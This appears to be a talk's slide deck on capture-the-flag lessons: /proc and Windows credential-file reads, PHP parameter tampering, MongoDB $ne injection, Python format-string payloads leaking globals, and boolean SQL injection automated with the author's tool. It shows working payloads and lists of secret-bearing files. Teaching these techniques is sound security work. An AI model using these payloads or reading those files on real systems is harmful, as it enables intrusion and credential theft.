From Input to Injection

Practical Lessons from HKIRC CTF


@TrebledJ   •   2024 Aug. 14

1 — Interesting Techniques

2 – Boolean SQLi: PoC to Flag in 5 Minutes

From Input to Injection: Practical Lessons from HKIRC CTF   •   2024 Aug. 14

1.1 — Arbitrary File Reads with /proc/**

Where do we usually look when we have an arbitrary file read? (On Linux)

  • /etc/passwd, /etc/shadow - users, hashes
  • /home/<user>/.ssh/authorized_keys - SSH public keys, algos
  • /home/<user>/.ssh/id_* - SSH private keys
  • /proc/<pid>/cmdline - commands!!! + file structure!!!
  • /proc/<pid>/environ - env when process started
  • /proc/<pid>/cwd - cwd when process started

From Input to Injection: Practical Lessons from HKIRC CTF   •   2024 Aug. 14


What about Windows?

Files:

C:\inetpub\web.config
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\config\SAM
C:\Users\<username>\ntuser.dat    # registry hive

What about command line info?

# PowerShell
Get-WmiObject -Class Win32_Process | Select-Object CommandLine

# cmd.exe
wmic process get CommandLine

But not a file. :(

From Input to Injection: Practical Lessons from HKIRC CTF   •   2024 Aug. 14

1.2 — PHP Parameter Tampering

login.php (simplified):

$username = $_GET['username']
$password = $_GET['password']
$userinfo = ... // (optional) user controllered input

$userinfo["id"] = ...
$userinfo["username"] = $username;
$userinfo["password"] = $password;
$_SESSION["userinfo"] = $userinfo;

Normal usage:

POST /login.php HTTP/1.1
...

username=darklab&password=123456

$userinfo

  • Originally array(), but can tamper to be string.
  • This means ["..."] becomes [0].

Data Type Tampering:

POST /login.php HTTP/1.1
...

username=darklab&password=123456&userinfo=abc

$userinfo = "abc"
$userinfo["id"] = "123" // $userinfo[0] = '1'
$userinfo["username"] = "admin" // $userinfo[0] = 'a'
$userinfo["password"] = "password" // $userinfo[0] = 'p'

$_SESSION["userinfo"] = $userinfo;
From Input to Injection: Practical Lessons from HKIRC CTF   •   2024 Aug. 14

CVEs?

Couldn't find.

From Input to Injection: Practical Lessons from HKIRC CTF   •   2024 Aug. 14
POST /login.php HTTP/1.1
...

user=joe&password=123456

=> $_POST = array( [user]="joe", [password]="123456" )

POST /search.php HTTP/1.1
...

user[$ne]=joe&password=123456

=> $_POST = array( [username]=array([$ne]="joe"), [password]="123456" )
Potential MongoDB Injection!Also check out PHP Type Juggling.
From Input to Injection: Practical Lessons from HKIRC CTF   •   2024 Aug. 14

1.3 — Python Format String Injection

DEMO \o/
From Input to Injection: Practical Lessons from HKIRC CTF   •   2024 Aug. 14

Ultra Simplified Example:

PASSWORD = 'password_5910f7f523cd780c67'

class Car:
    def __init__(self, make, year, color):
        self.make, self.year, self.color = make, year, color
    
    def __str__(self):
        return f'Car(make={self.make},year={self.year},color={self.color})'

print(input('Input: ').format(Car('Toyota', 2020, 'Blue')))
# {0.__init__.__globals__[PASSWORD]}
  • Info disclosure!
  • () - function call doesn't work. No RCE :(
But what if the variable is in a different file?
From Input to Injection: Practical Lessons from HKIRC CTF   •   2024 Aug. 14

No problem!

{user.__init__.__globals__[__loader__] \
 .__init__.__globals__[sys].modules[HealthyBMI.settings] \
 .__dict__[FLAG]} 

# user_controlled_string.format(user=request.user)
  1. Get loader (importer).
  2. Get module.
  3. Get global symbol.

img1


From Input to Injection: Practical Lessons from HKIRC CTF   •   2024 Aug. 14

Real Problems, Real Vulns

Various Python format-string CVEs:

  • CVE-2014-6262 - rrdtool (bandwidth/temp/CPU load collector) → RCE, DoS
From Input to Injection: Practical Lessons from HKIRC CTF   •   2024 Aug. 14

1 — Interesting Techniques

2 — Boolean SQLi: PoC to Flag in 5 Minutes

From Input to Injection: Practical Lessons from HKIRC CTF   •   2024 Aug. 14

My Secret Sauce — bsqli.py

  • Used in OSCP + Multiple Engagements
  • Employs similar tricks used by SQLmap, but urges the user to take more control
  • Prettier interface (IMHO): CLI, multiprocessing
  • https://github.com/TrebledJ/bsqli.py
From Input to Injection: Practical Lessons from HKIRC CTF   •   2024 Aug. 14

Demo Walkthrough

\o/ DEMO \o/
From Input to Injection: Practical Lessons from HKIRC CTF   •   2024 Aug. 14

Basic PoC

PoC with Script: Get DB Version

From Input to Injection: Practical Lessons from HKIRC CTF   •   2024 Aug. 14

Get Table Names (starting with f)

Get DB Name

Get Columns. (SELECT * won't work bc subqueries expect one column.)

From Input to Injection: Practical Lessons from HKIRC CTF   •   2024 Aug. 14

Now that we know the db, table, and column, we can select-from it.

GG!

From Input to Injection: Practical Lessons from HKIRC CTF   •   2024 Aug. 14

img1
img2
img3

Why go deeper?

  • Explore Attack Chain - discover creds, users, PII, etc.
  • Client may not understand risk from "version poc".
    • "Ok. So we're using MySQL 8.33. Big deal." - Oblivious Person
  • Understand their systems design.
    • Multiple apps using the same DB is a risk.
    • UAT and prod using the same DB is a risk.
From Input to Injection: Practical Lessons from HKIRC CTF   •   2024 Aug. 14

Resources

Techniques

bsqli.py

From Input to Injection: Practical Lessons from HKIRC CTF   •   2024 Aug. 14

Slides are available at: https://trebledj.me/slides/


Hope you enjoyed!

Thumbnail npx @marp-team/marp-cli@latest --theme-set nord.css --image jpeg -o from-input-to-injection.jpg . Server npx @marp-team/marp-cli@latest --theme-set nord.css --html . HTML npx @marp-team/marp-cli@latest --theme-set nord.css --html -o 2024-08-14-from-input-to-injection.html --title 'From Input to Injection: Practical Lessons from HKIRC CTF' --description 'Casual sharing on interesting techniques we picked up from HKIRC CTF: arbitrary file reads, PHP parameter tampering, and Python format string injection. We also explore how to automate boolean SQL injection for speed and fun.' --url https://trebledj.me/slides/from-input-to-injection/ --og-image /img/slides/from-input-to-injection.jpg pres.md PDF npx @marp-team/marp-cli@latest --theme-set nord.css --html -o 2024-08-14-from-input-to-injection.pdf --pdf --allow-local-files .

Did I miss anything?

<div data-marpit-fragment> Reference: [Linux File System - `/proc`](https://tldp.org/LDP/Linux-Filesystem-Hierarchy/html/proc.html) </div>

But on a related note...

PHP types are more brittle than you think.

References: [Read Gadgets](https://book.hacktricks.xyz/generic-methodologies-and-resources/python/python-internal-read-gadgets) • [Python Format String](https://book.hacktricks.xyz/generic-methodologies-and-resources/python/bypass-python-sandboxes#sensitive-information-disclosure-payloads)

Django app!

FrappeFramework: Low code SAAS. Think of it as a CMS.

Questions!??

Who has discovered and exploited this in engagements?

- Ramble

Walkthrough SQLite Demo:

- Basic PoC

- PoC with UNICODE/SUBSTRING

- PoC with script

Share about that engagement with multiple subsidiaries.

--- ### Takeaways * Speed matters. * Enumerate both widely and deeply. * If you repeat something *a lot*, consider automating it. * Downside: (probably) no BD hours.